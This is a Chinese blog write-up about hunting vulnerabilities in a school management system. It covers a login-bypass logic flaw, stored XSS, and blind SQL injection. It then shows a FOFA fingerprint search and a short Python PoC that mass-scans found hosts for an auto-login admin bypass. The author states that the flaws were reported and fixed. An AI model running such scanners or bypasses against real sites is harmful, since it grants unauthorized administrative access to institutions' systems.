一、漏洞挖掘
1、邏輯缺陷
熟悉的頁面,熟悉的弱口令測試,但無果
我就把目光轉向js審計,果不其然有新發現,可以根據賬號自動登錄
于是直接構造請求繞過登錄
經典的管理員權限
2、存儲型XSS
尋找文本輸入
淺析:前端:這里的標簽都是普通標簽,沒有像RCDATA元素(RCDATA elements),有
所以就簡單了,直接插入即可
3、SQL注入
測試無果
最后發現注入點在第一個函數,果然任何一個輸入點都可能是不安全的,是布爾型盲注
后面就是經典Sqlmap了
二、繼續通殺
根據系統指紋在fofa上搜索:"xx系統" && icon_hash="11xxxx"有32個IP,看了下,有重復的
使用fofa_viewer導出目標 這里我根據第一個邏輯漏洞的漏洞指紋信息,寫了一個簡單poc
import requests def poc(url): poc_url = url + '/login/doautologin.edu' data = {'um.userid': "admin"} try: res = requests.post(poc_url, data=data, timeout=5) if (res.headers.get("Set-Cookie")): # 登錄成功就會set-cookie print(url + '/login.html') except BaseException: pass if __name__ == '__main__': with open('url.txt', 'r') as f: for i in f: poc(i.rstrip(' '))
以上漏洞均已報告給相應學校且已修復
三、思考總結
1)在訪問系統當中的時候F12查看源碼是一個不錯的習慣(尤其是有前端彈框的)
2)前端代碼的一切展示行為完全可控(一定要理解這句話)
3)了解程序的底層邏輯,你才能更清晰的知道每一個參數的意義
本文作者:B0ther
審核編輯:黃飛
-
SQL
+關注
關注
1文章
764瀏覽量
44152 -
安全漏洞
+關注
關注
0文章
151瀏覽量
16716 -
edu
+關注
關注
0文章
14瀏覽量
1748
原文標題:記一次EDU網站漏洞通殺
文章出處:【微信號:菜鳥學安全,微信公眾號:菜鳥學安全】歡迎添加關注!文章轉載請注明出處。
發布評論請先 登錄
相關推薦
評論